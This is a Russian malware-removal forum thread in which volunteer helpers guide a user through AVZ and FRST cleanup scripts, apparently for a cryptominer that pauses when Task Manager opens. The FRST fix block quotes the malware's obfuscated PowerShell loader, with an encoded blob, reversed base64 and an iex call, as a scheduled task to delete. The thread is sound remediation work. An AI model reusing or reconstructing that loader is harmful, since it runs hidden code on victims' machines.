Время от времени начал тормозить компьютер, пока не откроешь диспетчер задач.

Недавно началось, не заметил после каких действий. Иногда начинает сильно тормозить компьютер, даже открытые окна еле перемещаются. При открытии диспетчера задач все резко прекращается и возвращается в нормальное состояние.

Уважаемый(ая) [B]Gwinbleid[/B], спасибо за обращение на наш форум!

Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в [URL="https://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].

[INFORMATION]Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом [URL="https://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста, [URL="https://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].

Здравствуйте!

[URL="http://virusinfo.info/showthread.php?t=130828"][b]Временно[/b] отключите защитное ПО[/URL].
[URL="http://virusinfo.info/showthread.php?t=7239"]Выполните скрипт в AVZ[/URL]:

[CODE]begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
ClearQuarantineEx(true);
QuarantineFile('C:\Mhs\Run_mhs.vbe', '');
QuarantineFile('C:\ProgramData\windows\dlchosts.exe', '');
QuarantineFile('C:\ProgramData\Windows\Profile\1.vbs', '');
QuarantineFile('C:\ProgramData\windows\profile\dllhostn.exe', '');
QuarantineFile('C:\ProgramData\windows\profile\service.exe', '');
QuarantineFileF('c:\programdata\windows', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0 , 0);
DeleteSchedulerTask('Mhs');
DeleteSchedulerTask('Microsoft\Windows\DiskDiagnostic\DiskDiagnostic');
DeleteSchedulerTask('Microsoft\Windows\Maintenance\WinNAT');
DeleteFile('C:\Mhs\Run_mhs.vbe', '64');
DeleteFile('C:\ProgramData\windows\dlchosts.exe', '');
DeleteFile('C:\ProgramData\Windows\Profile\1.vbs', '64');
DeleteFile('C:\ProgramData\windows\profile\dllhostn.exe', '');
DeleteFile('C:\ProgramData\windows\profile\service.exe', '');
DeleteFileMask('c:\programdata\windows', '*', true);
DeleteDirectory('c:\programdata\windows');
CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.
[/CODE]

Компьютер [U]перезагрузится[/U].


Файл [B]quarantine.zip[/B] из папки AVZ загрузите по ссылке "[B][COLOR="Red"]Прислать запрошенный карантин[/COLOR][/B]" вверху темы.


Сделайте повторные логи по [URL="http://virusinfo.info/pravila.html"]правилам[/URL]. ([COLOR="RoyalBlue"]CollectionLog[/COLOR])

Прикрепил новые логи, отправил карантин. run_mhs.vbe вчера удалил, касперский на него ругался после проверки, да и толку мало от него было.

Скачайте [URL="https://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/"]Farbar Recovery Scan Tool[/URL] (или с [url=https://www.geekstogo.com/forum/files/file/435-frst-farbar-recovery-scan-tool/]зеркала[/url]) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите [B]Да[/B] для соглашения с предупреждением.

Нажмите кнопку [B]Сканировать[/B] ([B]Scan[/B]).
После окончания сканирования будут созданы отчеты [B]FRST.txt[/B] и [B]Addition.txt[/B] в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.

Прикреплены

[B]Примите к сведению[/B] - после выполнения скрипта (возможно) все открытые вкладки браузеров будут закрыты, произойдет выход из аккаунтов, временные файлы, корзина, история браузеров, куки и кэш будут очищены.
[List][*] Отключите до перезагрузки антивирус.[*] Выделите следующий код:
[code]Start::
SystemRestore: On
CreateRestorePoint:
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ограничение <==== ВНИМАНИЕ
GroupPolicy: Ограничение ? <==== ВНИМАНИЕ
Policies: C:\ProgramData\NTUSER.pol: Ограничение <==== ВНИМАНИЕ
Task: {618FB81D-F067-47EE-AFB9-189B33800E5C} - System32\Tasks\Microsoft\Windows\Maintenance\WinNAT => 1.vbs
Task: {7402779C-54C2-4376-8B16-04FE28B15219} - System32\Tasks\Microsoft\Windows\DiskDiagnostic\DiskDiagnostic => powershell.exe -c "$blZO='uHamOuAjvUmrXcVcty3AVNIs1H/1TcoYnASYSsdfmgnoZJUF3nvpKux3+H7vfa9i4QCjcbsn7zjCRoV2zTzcH5IZhByJX91ezUS8J4ldvmzrKNZl9nr4bKFB8APofestyH+NTKdykk7jH5AJwFLeRsZCyV6pMclW3jupN7supzvpJdpB8APofestyH+NTKdykkz0AZ0VmwS1StIzjwPmd5xI1Gj4LKIj7jHadO19/jHpbOlR436QEJV0hCO1FokcmxXTVJpeqBXicbgHlWfoOL1y/SS/aq9i+x/kYbsn9iHdEINnzTrjXq8VnCKNA5gfkxXiK9Bb1Gr4OL1172+1S/Vz/QXvW+ln4yHdEM1zlX2xWLMjkQOcFYVevgnpdZwShFSmP99183LZefJ3v0TPbPRq6H3RSp5yhzP+EoIViwTII5EDiQPqLbAv3lrod/xm8U3+eeV3+1i4avVzqF2cFqJyg27+HpsVuwSaFYkd1U+uKtcylWj4UfZC8nuzMag7qVi4ca0hsC2SVJpjiXazWdMZjlizGYYEoELkZ9lNnmy8Nqk1tWS/a7AvzhXoNdRi6H6WD9A6vXf/GYUFhVDZUMU9nB7ubowN0D2nIfNtoUTobPN75xfBQ+ti8nKkWMp2km25K4URnBi1StICkhPpZ9FTlT62XvRm6HfGIrth4B60Q+ti8nKkWMpS2ja1A9lZwVnBS4EW1UL0MtlNnGy8NrB8uHXxM7wwpxPzdaQ4+3+VEZVs1HT7W9VSxgSDUtMN2QfjPtsIhH3sP7YouHXxN+h8uF7scPY87yfdC9Is1GysK7sJmwSNHcY+mBKpVJwComztcPx06EKhIsJg7BHofa4n537QWdRl3l/9HIcHqQWcH7oVmQ/1ZpoUzS36ZPV0+SS/aq9H+hXuWeFm6G7ERoV2yzrjA5hNzALGN40ErwP0c5YOg2y0LKIj/3umPPNh+V7PbOd382m6DZRyy3f3WLMZhgS1VIsU3UvpZtlTwDu1fvx/9WvmPPMv7RX/OK5Y1WOKFpV63l3+Hp4VmgS1StI2jwnqQZgTlT+oVu119XH8MKl87Aexd+Rp43mNQqNug2r0HcY5p167BJoVnAvVZpgElXu0Iet07DHcffVA7APsd+hw40mNEJV2nTa4WcFeuhWJFLwfuAjjK9BJ2Sm0Ifhjtz3uIehn4x/3d6QqvWeQBNg33XD+BMhUmlmTFZAZiRujccQ7o3Dvcfxqskv+YPU8zB7/d+Jq6H2kWMpCpFipXq8VnCOcAoEemk6jcdBb1GihLb11oTvpNvJi5RnoMKQjpDbLS9lMwEOqVIdN2EuBFsBUnEaqZohAwSDnIfY6tHb+YKE2+yutRa8j+jq2F4Q6o2rjGYYXlRWEA40Zm06jYtlNlXi8MrB8uGemOqMpoT75b6tM5HCcAYQ3o2fiBI0dxiSAAo0RmQ/pZNcthX35fbEj6G3ufa02+yutRapY9H+fP9Rv2Te/M4QfmxXAWdMZm06je9Ab1GahJ6kl4Xr3a+RprR+hOrch+2ecDoNyi3vpGZwNzB/VVIdejhPlcI0SmWf7LakrvETIYfJm7B2yVed37kfDWL1+njakQNhAxFDMH8Y8mAjgd5FJ2TK4d+o6+Hr4OKlJ2gnvbONuqE6cGoQ5tXDyH4wZhhe1StIlqSC/Lb4FhEvlcfx0tDv0MagyoVT1M6Q17W/MG4Jclyb2UsFLzAKbTbMFjw/aOcMlg2r9dfxD/Wv6S/Vg4B77MN1A6XSPB4JjrSSrJIcyiQONRtwjiRTubZ5I1HvvLLA8uG2mQ9Jr+gT5dahN427XNZV1onvgBY0DnC3SSqsCmAfzZtFEkW23J792oT2wPPNhoEu4aqhC6naWFbFihHHDFYwZmhWLBNVUmwfrcJxb1HuyUOpi7l78fe9mtFTpeb0n9DSJEJ9viSO1ANNUml6vFZwimBX3bJcTlSG1edZy6DLVbe1+sg==';&('ivRzevRzx'-replace'vRz')('$d=([regex]::Matches(''=kSKnkCZkgyZupnU2lmc0N1JrcCdldkL4YEVVpjOddmbppnU2R2bjpnU25WRuQHe6JldlRlLtVGd6JldzlneSZ3UbdCK4pnU2VmeSZXaoACe6JldlpnU2l2OpIXZi1WduxWYpJXZT5iai9GJgsCInAyJgsCIsVGZv1kLqJ2bkgCIpkyTaxmYkgyZulmc0pnU2NFN6Jld2U2chpnU2JUbvpnU2JnR6oTX0JXZ252bD5SblR3c5N1WoAyY6JldlRGI9ACZksjclJWb15GbhlmeSZnclNFIswWZ6Jldk9WTgQ3YlpnU2xWZzBCfg03JwUkVJJFRMFkeSZ3QJNVWIBFXuwFXnAScl1CIElUZ6JldjlmdlRkLfRyegUmc6Jldlh2dgwHIlZXa6JldyR2a6JldzlGZfJzM6JldulmeSZ3dgkWb3dGI9AiaipnU29GJ9tjYjRCIuJneSZXd0Vmc9tyKqRyOzRCIy9Gei1CIdpGJbJGckAicvpnU2hnYtASXpRyWiNGJg0DIdlGJbJ2YkszckAicvpnU2hnYtASKyUTMgI3bi1CIzRCIk5meSZXYi1CIzIDKg0DIzRCI9BTPqRyepQnb192QuIGckASZn1CIqRCKml2epsyKpRCI7Qnb192QuI2YkACds1CIpRCI7ADI9ASakgicvpnU2Z2Ow0jaksTXwslYwRCI9AycksTKzNXYwRCKzVmeSZHd5JEd6JldldkL4YEVVpjOddmb6JldpR2bj5WRuQneSZHelRlLtVmeSZHdzl3UbBSPgImeSZHcksXKzNneSZXYwRSXn5WaypnU2R3cbBCLipnU2NGJd11WlRneSZXeitFKjVmeSZHZg42bpR3Y6JlduVnZ'',''.'',''RivRzghvRztTvRzoLvRzeft'')|FovRzrEavRzch {$vRz_vRz.valvRzue}) -jvRzo'+'in '''';$d=[TevRzxt.EncovRzding]::UTvRzF'+2*2*2+'.GevRztString([ConvRzvert]::Fro'+'mvRzB'+'ase'+8*8+'StrivRzng($vRzd));&(''ivRzevRzx'')($d -repvRzlace''vvRzRz'');'-replace'vRz')" <==== ВНИМАНИЕ
CHR HomePage: Default -> hxxp://search.conduit.com/?ctid=CT3317209&octid=EB_ORIGINAL_CTID&SearchSource=55&CUI=&UM=2&UP=SP34D47906-8607-4650-ADC6-5FECF3F2191F&SSPV=
Folder:C:\ProgramData\Windows
2021-07-16 21:45 - 2021-07-20 11:53 - 000000000 _RSHD C:\ProgramData\Windows
ContextMenuHandlers1: [Advanced SystemCare] -> {2803063F-4B8D-4dc6-8874-D1802487FE2D} => -> Нет файла
ContextMenuHandlers2: [Advanced SystemCare] -> {2803063F-4B8D-4dc6-8874-D1802487FE2D} => -> Нет файла
AlternateDataStreams: C:\ProgramData\Temp:D31D1159 [149]
FirewallRules: [{B075B8D4-31E3-48CB-8780-2C639D601F18}] => (Allow) LPort=5357
FirewallRules: [{03337AE5-806F-401C-8867-F166F46B0EAA}] => (Allow) LPort=80
FirewallRules: [{1260FD92-6997-4F90-B743-33021C4BC434}] => (Allow) C:\ProgramData\Windows\Profile\dllhostn.exe => Нет файла
FirewallRules: [{5CD59311-2D08-42EB-AE56-9C21DE4ADE58}] => (Allow) C:\ProgramData\Windows\Profile\wasp.exe => Нет файла
FirewallRules: [{1377F5E8-86A1-4BB1-BD23-3BD69749EE4C}] => (Allow) C:\ProgramData\Windows\Profile\waspwing.exe => Нет файла
ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
EmptyTemp:
Reboot:
End::[/code]
[*] Скопируйте выделенный текст (правой кнопкой - Копировать).[*] Запустите FRST (FRST64) от имени администратора.[*] Нажмите [B]Исправить[/B] ([B]Fix[/B]) один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.[/List]
Компьютер будет перезагружен автоматически.

Fixlog

Что сейчас с проблемой?

Пока не проявлялась. Понаблюдаю сегодня-завтра, напишу. Спасибо

Пока наблюдаете, проделайте следующее:
[LIST][*]Загрузите [B][URL=https://www.comss.ru/page.php?id=1813]SecurityCheck by glax24 & Severnyj[/URL][/B], сохраните утилиту на [I]Рабочем столе[/I] и извлеките из архива.[*]Запустите двойным щелчком мыши (если Вы используете [I]Windows XP[/I]) или из меню по щелчку правой кнопки мыши [I]Запустить от имени администратора[/I] (если Вы используете [I]Windows Vista/7/8/8.1/10[/I])[*]Если увидите [U]предупреждение от вашего фаервола или SmartScreen[/U] относительно программы SecurityCheck, не блокируйте ее работу[*]Дождитесь окончания сканирования, откроется лог в блокноте с именем [B]SecurityCheck.txt[/B][*]Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем [I]SecurityCheck[/I], например [I][COLOR="Blue"]C:\SecurityCheck\SecurityCheck.txt[/COLOR][/I][*]Прикрепите этот файл к своему следующему сообщению.[/LIST]

Готово

------------------------------- [ Windows ] -------------------------------
Internet Explorer 11.1198.18362.0 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB5001566]Скачать обновления[/url][/b][/color]
--------------------------- [ OtherUtilities ] ----------------------------
Git version 2.29.2.2 v.2.29.2.2 [color=red][b]Внимание! [url=https://git-scm.com/download/win]Скачать обновления[/url][/b][/color]
Oracle VM VirtualBox 4.3.12_ZZZZ v.4.3.12 [color=red][b]Внимание! [url=https://www.virtualbox.org/wiki/Downloads]Скачать обновления[/url][/b][/color]
Python 3.9.0 (64-bit) v.3.9.150.0 [color=red][b]Внимание! [url=https://www.python.org/downloads/windows/]Скачать обновления[/url][/b][/color]
Ghostscript GPL 8.64 (Msi Setup) v.8.64 [color=red][b]Внимание! [url=https://ghostscript.com/download/gsdnld.html]Скачать обновления[/url][/b][/color]
[color=blue][b]^Удалите старую версию, скачайте и установите новую.^[/b][/color]
Intel® Driver & Support Assistant v.3.2.0.9 [color=red][b]Внимание! [url=https://downloadcenter.intel.com/ru/download/24345/Intel-Driver-Support-Assistant]Скачать обновления[/url][/b][/color]
------------------------------ [ ArchAndFM ] ------------------------------
WinRAR 5.90 (64-bit) v.5.90.0 [color=red][b]Внимание! [url=https://www.rarlab.com/download.htm]Скачать обновления[/url][/b][/color]
---------------------------- [ ProxyAndVPNs ] -----------------------------
OpenVPN 2.4.8-I602-Win10 v.2.4.8-I602-Win10 [color=red][b]Внимание! [url=https://openvpn.net/community-downloads/]Скачать обновления[/url][/b][/color]
-------------------------------- [ Media ] --------------------------------
VLC media player v.3.0.12 [color=red][b]Внимание! [url=https://www.videolan.org/vlc/download-windows.ru.html]Скачать обновления[/url][/b][/color]
--------------------------- [ AdobeProduction ] ---------------------------
Adobe Flash Player 27 PPAPI v.27.0.0.187 [color=red][b]Данная программа больше не поддерживается разработчиком.[/b][/color] Рекомендуется деинсталлировать ее.

Перечисленное желательно по возможности обновить/исправить.

Спасибо, обновлю как время появится. Вроде больше так не тормозило.